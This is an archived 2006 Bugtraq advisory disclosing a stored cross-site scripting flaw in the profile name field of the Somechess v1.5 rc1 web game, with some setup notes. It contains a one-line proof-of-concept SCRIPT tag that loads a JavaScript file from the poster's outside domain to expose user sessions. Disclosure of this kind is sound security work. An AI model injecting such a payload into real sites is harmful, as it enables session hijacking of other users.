| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 20 Jun 2006 21:19:44 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Somechess v1.5 rc1 - XSS Somechess v1.5 rc1 Homepage: http://www.astrodogpress.org/chess/ Affected files: *Profile input boxes ----------------------- Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like it did to me), then just remove all the " from the sql file. You'll also have to manually add players & their pw's (md5 hashed) via phpmyadmin or whatever you use. Theres also a php error on menu.php that you'll have to fix since it won't allow you to connect to the game DB ----------------------- XSS vuln with session disclosure from "New name" profile input box. Data isn't sanatized before being generated. PoC: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://youfucktard.com/xsp/somechess1.jpg http://youfucktard.com/xsp/somechess2.jpg
Powered by blists - more mailing lists